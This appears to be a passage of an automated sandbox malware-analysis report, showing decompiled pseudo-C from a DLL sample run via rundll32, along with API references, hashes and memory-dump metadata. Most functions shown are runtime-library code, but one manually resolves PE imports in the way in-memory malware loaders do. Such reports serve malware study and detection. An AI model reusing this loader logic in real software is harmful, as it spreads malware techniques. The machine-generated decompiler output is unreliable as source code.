						_t15 = E1000C3E3(_t23, __edx, __edi, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E1000C3E3(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x10019d50);
						E1000B078(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E1000C3E3(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E1000B0BD(E10009F26(_t23, _t24, _t25));
					}
				}
			}

0x10007c9c
0x10007c9c
0x10007ca6
0x10007cad
0x10007ccc
0x10007cd3
0x10007cda
0x10007cdf
0x10007cdf
0x10007cdf
0x00000000
0x10007caf
0x10007caf
0x10007cb4
0x10007ce1
0x10007ce1
0x10007ce4
0x10007cb6
0x10007cbb
0x1000cb87
0x1000cb89
0x1000cb8e
0x1000cb98
0x1000cb9d
0x1000cb9f
0x1000cba3
0x1000cbae
0x1000cbae
0x1000cbbf
0x1000cbbf
0x10007cb4

APIs

__getptd.LIBCMT ref: 10007CB6

Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3

__getptd.LIBCMT ref: 10007CC7
__getptd.LIBCMT ref: 10007CD5

Strings

MOC, xrefs: 10007CA8

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC
API String ID: 803148776-624257665
Opcode ID: 533799551ab5621f90d1c8c2dd912f006ed24f99fabe8d318c7649798b605778
Instruction ID: 748e218daad55e3622726c51059574500725c268f5a768dba96258ea37b88039
Opcode Fuzzy Hash: 533799551ab5621f90d1c8c2dd912f006ed24f99fabe8d318c7649798b605778
Instruction Fuzzy Hash: 1AE0BF3991030C8FF750DB65C086F5837E4FB49394F1941A6E44CC72A7DB38F9509A92

Uniqueness

Uniqueness Score: -1.00%

Function 100041A0, Relevance: 6.4, APIs: 5, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E100041A0(signed int _a4) {
				void* _v4;
				intOrPtr _v8;
				intOrPtr* _t45;
				intOrPtr _t48;
				intOrPtr _t53;
				void _t57;
				signed int _t58;
				void* _t60;
				signed int _t63;
				intOrPtr _t69;
				void* _t87;
				signed int* _t91;
				intOrPtr* _t93;
				intOrPtr _t94;
				signed int* _t95;
				void* _t97;
				void* _t98;

				_t97 =  &_v8;
				_t93 = _a4;
				_t94 =  *((intOrPtr*)(_t93 + 4));
				_t45 =  *_t93 - 0xffffff80;
				_v8 = _t94;
				_a4 = 1;
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					_t87 =  *_t45 + _t94;
					_v4 = _t87;
					if(IsBadReadPtr(_t87, 0x14) != 0) {
						L21:
						return _a4;
					} else {
						while(1) {
							_t48 =  *((intOrPtr*)(_t87 + 0xc));
							if(_t48 == 0) {
								break;
							}
							_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x1c))))(_t48 + _t94,  *((intOrPtr*)(_t93 + 0x28)));
							_t98 = _t97 + 8;
							if(_t69 == 0) {
								SetLastError(0x7e);
								_a4 = 0;
								return _a4;
							} else {
								_t53 = E10003CE0( *((intOrPtr*)(_t93 + 8)), 4 +  *(_t93 + 0xc) * 4);
								_t97 = _t98 + 8;
								if(_t53 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x24))))(_t69,  *((intOrPtr*)(_t93 + 0x28)));
									SetLastError(0xe);
									_a4 = 0;
									return _a4;
								} else {
									 *((intOrPtr*)(_t93 + 8)) = _t53;
									 *((intOrPtr*)(_t53 +  *(_t93 + 0xc) * 4)) = _t69;
									 *(_t93 + 0xc) =  *(_t93 + 0xc) + 1;
									_t57 =  *_t87;
									if(_t57 == 0) {
										_t95 = _t94 +  *((intOrPtr*)(_t87 + 0x10));
										_t91 = _t95;
									} else {
										_t95 = _t94 + _t57;
										_t91 =  *((intOrPtr*)(_t87 + 0x10)) + _v8;
									}
									_t58 =  *_t95;
									if(_t58 == 0) {
										L17:
										_t60 = _v4 + 0x14;
										_v4 = _t60;
										if(IsBadReadPtr(_t60, 0x14) != 0) {
											break;
										} else {
											_t94 = _v8;
											_t87 = _v4;
											continue;
										}
									} else {
										while(1) {
											_push( *((intOrPtr*)(_t93 + 0x28)));
											if(_t58 >= 0) {
												_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x20))))(_t69, _t58 + _v8 + 2);
											} else {
												_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x20))))(_t69, _t58 & 0x0000ffff);
											}
											_t97 = _t97 + 0xc;
											 *_t91 = _t63;
											if(_t63 == 0) {
												break;
											}
											_t58 = _a4;
											_t91 =  &(_t91[1]);
											if(_t58 != 0) {
												continue;
											} else {
												goto L17;
											}
											goto L24;
										}
										_a4 = 0;
										 *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x24))))(_t69,  *((intOrPtr*)(_t93 + 0x28)));
										SetLastError(0x7f);
										break;
									}
								}
							}
							goto L24;
						}
						goto L21;
					}
				} else {
					return 1;
				}
				L24:
			}

0x100041a0
0x100041a5
0x100041ab
0x100041ae
0x100041b5
0x100041b9
0x100041c1
0x100041d3
0x100041d8
0x100041e4
0x100042de
0x100042e8
0x100041ea
0x100041f0
0x100041f0
0x100041f5
0x00000000
0x00000000
0x10004207
0x10004209
0x1000420e
0x100042ed
0x100042f5
0x10004306
0x10004214
0x10004223
0x10004228
0x1000422d
0x10004311
0x10004318
0x10004320
0x10004331
0x10004233
0x10004236
0x10004239
0x1000423c
0x1000423f
0x10004243
0x10004253
0x10004255
0x10004245
0x10004248
0x1000424a
0x1000424a
0x10004257
0x1000425c
0x1000429b
0x1000429f
0x100042a5
0x100042b1
0x00000000
0x100042b3
0x100042b3
0x100042b7
0x00000000
0x100042b7
0x10004260
0x10004260
0x10004263
0x10004266
0x10004283
0x10004268
0x10004272
0x10004272
0x10004285
0x10004288
0x1000428c
0x00000000
0x00000000
0x1000428e
0x10004294
0x10004299
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10004299
0x100042c8
0x100042d0
0x100042d7
0x00000000
0x100042d7
0x1000425c
0x1000422d
0x00000000
0x1000420e
0x00000000
0x100042dd
0x100041c4
0x100041cd
0x100041cd
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,?), ref: 100041DC
IsBadReadPtr.KERNEL32(?,00000014,?,?,00000000,00000000,?,00000000), ref: 100042A9
SetLastError.KERNEL32(0000007F,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 100042D7

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Read$ErrorLast
String ID:
API String ID: 2715074504-0
Opcode ID: b417d0638b75f135a4bc08a9313aee768ca7022b991b6e78e246613ce2e49123
Instruction ID: efa1043a0b20c9ed80e11ee60e030ac585fb5041ac03c1c204f013357def7678
Opcode Fuzzy Hash: b417d0638b75f135a4bc08a9313aee768ca7022b991b6e78e246613ce2e49123
Instruction Fuzzy Hash: 8041AFB12007029BE300CF69EC84A57B3E8FF88794F028529F94587350EB31F919CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100054A1, Relevance: 6.2, APIs: 4, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E100054A1(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t54;
				void* _t58;
				intOrPtr _t61;
				signed int _t67;
				void* _t106;
				void* _t130;

				_t123 = __edi;
				_t122 = __edx;
				_t95 = __ebx;
				_push(0x58);
				E10007B94(E100154E3, __ebx, __edi, __esi);
				_t129 = __ecx;
				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
					_t52 =  *(_t129 + 0x4c);
					__eflags = _t52;
					if(_t52 != 0) {
						__eflags =  *(_t129 + 0x3c);
						if(__eflags != 0) {
							E100050D9(_t130 - 0x2c);
							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
							while(1) {
								_push( *(_t129 + 0x4c));
								_t54 = E10008952(_t95, _t122, _t123, _t129, __eflags);
								__eflags = _t54 - 0xffffffff;
								if(_t54 == 0xffffffff) {
									break;
								}
								E1000540E(_t54, _t130 - 0x2c, _t122, _t129, 1, _t54);
								_t58 = E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x44));
								_t95 = _t58;
								_t61 = E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x64));
								_t122 =  *( *(_t129 + 0x3c));
								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
								__eflags = _t67;
								if(_t67 < 0) {
									break;
								} else {
									_t123 = 1;
									__eflags = _t67 - 1;
									if(_t67 <= 1) {
										_t106 = _t130 - 0x2c;
										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E10004AEE(E10005335(_t106, _t130 - 0x54));
											while(1) {
												__eflags = _t123;
												if(_t123 <= 0) {
													goto L23;
												}
												_push( *(_t129 + 0x4c));
												_t123 = _t123 - 1;
												__eflags = _t123;
												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
												E10008C53(_t95, _t122, _t123, _t129, _t123);
											}
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E10004AEE(E10005335(_t106, _t130 - 0x5c));
											E10001270(_t130 - 0x2c, _t122, _t130, 0,  *((intOrPtr*)(_t130 - 0x34)) - E10004AEE(E10005335(_t106, _t130 - 0x5c)));
											continue;
										}
									} else {
										__eflags = _t67 - 3;
										if(_t67 != 3) {
											break;
										} else {
											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
											if(__eflags < 0) {
												continue;
											} else {
												E100068D7(_t95, _t83, _t130 - 0x2d, 1, E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x4c)), 1);
												L23:
												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
											}
										}
									}
								}
								L19:
								E10001220(_t130 - 0x2c, _t130, 1, 0);
								goto L3;
							}
							__eflags = _t129;
							goto L19;
						} else {
							_t52 = E1000511D(__eflags, _t130 - 0x2d, _t52);
							__eflags = _t52;
							if(_t52 == 0) {
								goto L5;
							} else {
							}
						}
					} else {
						L5:
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
					_t129 =  *(__ecx + 0x20);
					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
				}
				L3:
				return E10007BDE(_t95, _t123, _t129);
			}

0x100054a1
0x100054a1
0x100054a1
0x100054a1
0x100054a8
0x100054ad
0x100054b6
0x100054e0
0x100054e3
0x100054e5
0x100054ec
0x100054f0
0x1000550b
0x10005510
0x100055db
0x100055db
0x100055de
0x100055e4
0x100055e7
0x00000000
0x00000000
0x1000551f
0x10005532
0x1000553a
0x1000554a
0x10005552
0x10005554
0x10005567
0x10005571
0x10005574
0x10005576
0x00000000
0x10005578
0x1000557a
0x1000557b
0x1000557d
0x100055b3
0x100055b6
0x100055b9
0x10005619
0x10005630
0x10005630
0x10005632
0x00000000
0x00000000
0x10005620
0x10005623
0x10005623
0x10005628
0x10005629
0x1000562f
0x00000000
0x100055bb
0x100055ce
0x100055d6
0x00000000
0x100055d6
0x1000557f
0x1000557f
0x10005582
0x00000000
0x10005584
0x10005584
0x10005587
0x00000000
0x10005589
0x100055a3
0x10005634
0x10005634
0x10005634
0x10005587
0x10005582
0x1000557d
0x100055f0
0x100055f7
0x00000000
0x100055fc
0x100055ed
0x00000000
0x100054f2
0x100054f7
0x100054fe
0x10005500
0x00000000
0x10005502
0x10005502
0x10005500
0x100054e7
0x100054e7
0x100054e7
0x100054c8
0x100054cb
0x100054cd
0x100054d5
0x100054d7
0x100054da
0x100054df

APIs

__EH_prolog3_GS.LIBCMT ref: 100054A8
_fgetc.LIBCMT ref: 100055DE

Part of subcall function 1000540E: std::_String_base::_Xlen.LIBCPMT ref: 10005424

_memcpy_s.LIBCMT ref: 100055A3
_ungetc.LIBCMT ref: 10005629

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
String ID:
API String ID: 9762108-0
Opcode ID: 4e5dfa554e32b8c66081f196d76509ceacc785a41fb5b784d226474a297008bd
Instruction ID: 5dbc0edad074bc516d1e3aa92765b13b845c281a9169638769e3243b87268825
Opcode Fuzzy Hash: 4e5dfa554e32b8c66081f196d76509ceacc785a41fb5b784d226474a297008bd
Instruction Fuzzy Hash: A751A2769005099FEB14CBB4C8559DFB3F9FF08392B60451AE551E7298EE32FA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10008FA9, Relevance: 6.1, APIs: 4, Instructions: 137
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10008FA9(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E1000E577(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E1000E545(_t90, _t98, _t100));
										_t74 = E1000EE57(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E10008CC5(_t90, _t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E10006BF0(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E1000B02E(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E1000708C(_t90, 0, _t100);
					goto L4;
				}
			}

0x10008fa9
0x10008fb9
0x10008fdf
0x00000000
0x10008fc0
0x10008fc0
0x10008fc3
0x10008fc5
0x10008fe6
0x10008fe9
0x10008feb
0x00000000
0x00000000
0x10008fed
0x10008ff2
0x10008ff5
0x10008ff8
0x00000000
0x00000000
0x10008ffd
0x10009001
0x10009008
0x1000900b
0x1000900e
0x10009010
0x1000901a
0x10009012
0x10009015
0x10009015
0x10009021
0x10009023
0x100090e8
0x00000000
0x10009029
0x10009029
0x1000902c
0x1000902c
0x10009032
0x10009063
0x10009063
0x10009066
0x100090bf
0x100090c6
0x100090c9
0x100090f4
0x100090f4
0x100090f6
0x00000000
0x100090fa
0x100090cb
0x100090ce
0x100090d1
0x100090d2
0x100090d5
0x100090d7
0x100090d9
0x100090d9
0x00000000
0x100090d7
0x10009068
0x1000906a
0x10009077
0x10009077
0x1000907b
0x1000907d
0x10009081
0x10009083
0x10009086
0x10009086
0x10009086
0x10009088
0x10009089
0x10009093
0x10009094
0x10009099
0x1000909c
0x1000909f
0x10009102
0x10009102
0x10009106
0x00000000
0x100090a1
0x100090a1
0x100090a3
0x100090a5
0x100090a7
0x100090a7
0x100090a9
0x100090ac
0x100090ae
0x100090b0
0x00000000
0x100090b2
0x100090b2
0x100090b2
0x00000000
0x100090b2
0x100090b0
0x1000909f
0x1000906d
0x10009073
0x10009075
0x00000000
0x00000000
0x00000000
0x10009075
0x10009034
0x10009037
0x10009039
0x00000000
0x00000000
0x1000903b
0x100090f0
0x100090f0
0x100090f0
0x00000000
0x100090f0
0x10009041
0x10009043
0x10009045
0x10009047
0x10009047
0x1000904f
0x10009054
0x10009057
0x10009059
0x1000905c
0x1000905e
0x00000000
0x100090e0
0x100090e0
0x100090e0
0x00000000
0x10009029
0x10009023
0x10008fc7
0x10008fc7
0x10008fcc
0x10008fcd
0x10008fce
0x10008fcf
0x10008fd0
0x10008fd1
0x10008fd7
0x00000000
0x10008fdc

APIs

__flush.LIBCMT ref: 1000906D
__fileno.LIBCMT ref: 1000908D
__locking.LIBCMT ref: 10009094
__flsbuf.LIBCMT ref: 100090BF

Part of subcall function 1000B02E: __getptd_noexit.LIBCMT ref: 1000B02E

Part of subcall function 1000708C: __decode_pointer.LIBCMT ref: 10007097

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 90c2df307816b9864583c0cfff05f289005b3de7282012ebd6b0bcd9c3d7a974
Instruction ID: 23d6b4e30aa61f3eb1ca52232f0f9b5df6bc3795a971e9f133615fbef43ceba0
Opcode Fuzzy Hash: 90c2df307816b9864583c0cfff05f289005b3de7282012ebd6b0bcd9c3d7a974
Instruction Fuzzy Hash: 5541B331A006459FFB14CFA988845AFB7F6FF803E0F218529E8A597158D771EE41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 100136B5, Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100136B5(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t74;

				_t74 = _a8;
				if(_t74 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t74 != 0) {
						E10009442( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E100137E6( *_t74 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000B02E(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t74[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t74 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x100136bf
0x100136c6
0x100136dd
0x00000000
0x100136cd
0x100136cf
0x100136e9
0x100136ee
0x100136f1
0x100136f4
0x1001371d
0x10013724
0x10013726
0x100137a7
0x100137c2
0x100137c4
0x10013704
0x10013704
0x10013707
0x10013709
0x1001370c
0x1001370c
0x1001370c
0x1001370c
0x00000000
0x10013712
0x10013786
0x10013786
0x1001378b
0x10013791
0x10013794
0x10013796
0x10013799
0x10013799
0x10013799
0x10013799
0x00000000
0x1001379d
0x10013728
0x1001372b
0x10013731
0x10013734
0x1001375b
0x1001375e
0x10013764
0x00000000
0x00000000
0x10013766
0x10013769
0x00000000
0x00000000
0x1001376b
0x1001376b
0x10013771
0x10013774
0x100136e2
0x100136e2
0x1001377d
0x00000000
0x1001377d
0x10013736
0x10013739
0x00000000
0x00000000
0x1001373d
0x1001374e
0x10013754
0x10013756
0x10013759
0x00000000
0x00000000
0x00000000
0x10013759
0x100136f6
0x100136f9
0x100136fb
0x10013701
0x10013701
0x00000000
0x100136d1
0x100136d1
0x100136d6
0x100136da
0x100136da
0x00000000
0x100136d6
0x100136cf

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100136E9
__isleadbyte_l.LIBCMT ref: 1001371D
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 1001374E
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 100137BC

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d3c89b6fc4c9a062a63f27f63a21df55c94e1a7d2321eb3fceb2aa8cfa4a7bff
Instruction ID: fe590c44e70f2d795bb3872b418c13e2d21e5b7396ab7666b262f08f3a11fc7a
Opcode Fuzzy Hash: d3c89b6fc4c9a062a63f27f63a21df55c94e1a7d2321eb3fceb2aa8cfa4a7bff
Instruction Fuzzy Hash: 1731C1B1B08296EFDB20DFA4C8849AE7BE5EF01261F11C5A8E4A49F1D1E730DD80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10008086, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10008086(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t30 = __eflags;
				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E10007476(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E1000C3E3(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E1000C3E3(_t19, _t26, _t27, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E1000744F(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E10007E0B(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x10008086
0x10008086
0x10008086
0x10008086
0x10008086
